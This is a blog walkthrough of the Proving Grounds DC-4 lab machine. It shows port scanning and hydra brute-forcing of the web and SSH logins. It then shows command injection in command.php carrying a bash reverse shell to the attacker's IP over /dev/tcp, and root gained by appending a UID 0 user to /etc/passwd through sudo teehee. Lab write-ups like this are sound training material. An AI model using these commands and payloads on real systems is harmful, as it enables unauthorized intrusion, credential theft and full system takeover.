Post

Proving Grounds - DC-4

Introduction

This is a Proving Grounds room which can be found at: DC-4

A double edged sword

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

  • Command: nmap -p- -T4 -v 192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
geobour98@kali:~$ nmap -p- -T4 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:48 EEST
Initiating Ping Scan at 19:48
Scanning 192.168.142.195 [2 ports]
Completed Ping Scan at 19:48, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:48
Completed Parallel DNS resolution of 1 host. at 19:48, 0.00s elapsed
Initiating Connect Scan at 19:48
Scanning 192.168.142.195 (192.168.142.195) [65535 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed Connect Scan at 19:49, 18.93s elapsed (65535 total ports)
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.053s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.03 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

  • Command: sudo nmap -A -sC -p 22,80 -v 192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 192.168.142.195
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 19:50 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating Ping Scan at 19:50
Scanning 192.168.142.195 [4 ports]
Completed Ping Scan at 19:50, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
Initiating SYN Stealth Scan at 19:50
Scanning 192.168.142.195 (192.168.142.195) [2 ports]
Discovered open port 22/tcp on 192.168.142.195
Discovered open port 80/tcp on 192.168.142.195
Completed SYN Stealth Scan at 19:50, 0.09s elapsed (2 total ports)
Initiating Service scan at 19:50
Scanning 2 services on 192.168.142.195 (192.168.142.195)
Completed Service scan at 19:50, 6.15s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.142.195 (192.168.142.195)
Retrying OS detection (try #2) against 192.168.142.195 (192.168.142.195)
Initiating Traceroute at 19:50
Completed Traceroute at 19:50, 0.07s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:50
Completed Parallel DNS resolution of 1 host. at 19:50, 0.00s elapsed
NSE: Script scanning 192.168.142.195.
Initiating NSE at 19:50
Completed NSE at 19:50, 1.75s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.22s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Nmap scan report for 192.168.142.195 (192.168.142.195)
Host is up (0.057s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: System Tools
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.13 (91%), Linux 3.10 - 3.16 (91%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 198.841 days (since Sun Mar 13 22:39:35 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   69.20 ms 192.168.49.1 (192.168.49.1)
2   69.37 ms 192.168.142.195 (192.168.142.195)

NSE: Script Post-scanning.
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Initiating NSE at 19:50
Completed NSE at 19:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.79 seconds
           Raw packets sent: 78 (5.316KB) | Rcvd: 36 (2.896KB)

Brute force the website for directories and files with the extension .php using gobuster.

  • Command: gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
geobour98@kali:~$ gobuster dir -u http://192.168.142.195/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.142.195/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/28 19:53:20 Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 302) [Size: 206] [--> index.php]
/images               (Status: 301) [Size: 170] [--> http://192.168.142.195/images/]
/index.php            (Status: 200) [Size: 506]                                     
/css                  (Status: 301) [Size: 170] [--> http://192.168.142.195/css/]   
/logout.php           (Status: 302) [Size: 163] [--> index.php]                     
/command.php          (Status: 302) [Size: 704] [--> index.php]

===============================================================
2022/09/28 20:01:23 Finished
===============================================================

Exploitation

The most interesting file is command.php but leads to index.php, so maybe we have to be authenticated in order to view it.

Now we brute force the admin user using hydra and if the success message contains the word command, then we have successfully brute forced the password.

  • Command: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
1
2
3
4
5
6
7
8
9
geobour98@kali:~$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.142.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=command"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 19:54:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.142.195:80/login.php:username=^USER^&password=^PASS^:S=command
[80][http-post-form] host: 192.168.142.195   login: admin   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 19:55:10

Now we can login with username admin and the found password, and navigate to /command.php.

Here we can execute some commands from the UI, but if we Intercept a request with Burp Suite, we see it is a POST request with a parameter radio, which executes linux commands. So we can put there a bash reverse shell like the following: bash -c 'exec bash -i &>/dev/tcp/192.168.49.117/443 <&1', but we have to URL-encode it first. The request in Burp Suite should look like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /command.php HTTP/1.1
Host: 192.168.142.195
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://192.168.142.195
Connection: close
Referer: http://192.168.142.195/command.php
Cookie: PHPSESSID=h8dn71jf3jkrrdgnd7u0a525f6
Upgrade-Insecure-Requests: 1

radio=bash+-c+'exec+bash+-i+%26>/dev/tcp/192.168.49.142/443+<%261'&submit=Run

Open a netcat listener and we get a reverse shell as www-data.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
listening on [any] 443 ...
connect to [192.168.49.142] from (UNKNOWN) [192.168.142.195] 53996
bash: cannot set terminal process group (541): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ ^Z
zsh: suspended  nc -lvnp 443

geobour98@kali:~$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443 
www-data@dc-4:/usr/share/nginx/html$ export TERM=xterm-256color
www-data@dc-4:/usr/share/nginx/html$ stty rows 38 cols 111
www-data@dc-4:/usr/share/nginx/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigate to /home/jim and we see local.txt. Also, we see an interesting folder backups, which contains the file old-passwords.bak.

1
2
3
4
5
www-data@dc-4:/home/jim$ cat local.txt 
[REDACTED]
www-data@dc-4:/home/jim$ cd backups
www-data@dc-4:/home/jim/backups$ ls 
old-passwords.bak

Then, transfer old-passwords.bak to the attacker machine and brute force the user jim with the found wordlist. We will use hydra again.

  • Command: hydra -l jim -P old-passwords.bak ssh://192.168.142.195
1
2
3
4
5
6
7
8
9
10
11
12
13
geobour98@kali:~$ hydra -l jim -P old-passwords.bak ssh://192.168.142.195
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-28 20:05:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.142.195:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 109 to do in 00:01h, 13 active
[STATUS] 105.50 tries/min, 211 tries in 00:02h, 44 to do in 00:01h, 13 active
[22][ssh] host: 192.168.142.195   login: jim   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-28 20:08:10

Now we can login with SSH as the user jim with the found password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
geobour98@kali:~$ ssh jim@192.168.142.195                                     
The authenticity of host '192.168.142.195 (192.168.142.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.142.195' (ED25519) to the list of known hosts.
jim@192.168.142.195's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

Then, we run find command to find files owned by jim. The most interesting is /var/mail/jim, which contains the password of user charles. So, we switch to that user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
jim@dc-4:~$ find / -type f -user jim 2>/dev/null
[REDACTED]
/var/mail/jim
[REDACTED]
jim@dc-4:~$ cat /var/mail/jim
[REDACTED]
Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anyt
hing goes wrong.

Password is:  [REDACTED]

See ya,
Charles
[REDACTED]
jim@dc-4:~$ su charles
Password: 
charles@dc-4:/home/jim$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)

Privilege Escalation

After executing the command: sudo -l we see that we can execute /usr/bin/teehee as root. If we run strings command on /usr/bin/teehee we will find the help menu of that binary.

Then we can execute it with the -a option to append a new user with both GID and UID as 0 (as root) at /etc/passwd.

Before running /usr/bin/teehee we must generate a hash of a password (geobour98 in my case) with openssl in order to put it in /etc/passwd.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ strings /usr/bin/teehee
[REDACTED]
Try '%s --help' for more information.                                                              
Usage: %s [OPTION]... [FILE]...                                                                    
Copy standard input to each FILE, and also to standard output.                                     
  -a, --append              append to the given FILEs, do not overwrite                            
  -i, --ignore-interrupts   ignore interrupt signals                                               
  -p                        diagnose errors writing to non pipes                                   
      --output-error[=MODE]   set behavior on write error.  See MODE below                         
      --help     display this help and exit                                                        
      --version  output version information and exit                                               
MODE determines behavior with write errors on the outputs:                                         
  'warn'         diagnose errors writing to any output                                             
  'warn-nopipe'  diagnose errors writing to any output not a pipe                                  
  'exit'         exit on error writing to any output                                               
  'exit-nopipe'  exit on error writing to any output not a pipe
[REDACTED]
charles@dc-4:~$ openssl passwd geobour98
Warning: truncating password to 8 characters
GWIOrZOActC.A
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd                                                
geobour98:GWIOrZOActC.A:0:0:::/bin/bash                                                                         
geobour98:GWIOrZOActC.A:0:0:::/bin/bash                                                                         
^C                                                                                                 
charles@dc-4:~$ cat /etc/passwd
[REDACTED]
geobour98:GWIOrZOActC.A:0:0:::/bin/bash
[REDACTED]
charles@dc-4:~$ su geobour98
Password: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# cat /root/proof.txt
[REDACTED]

Proof of Concept (PoC image): Desktop View

This post is licensed under CC BY 4.0 by the author.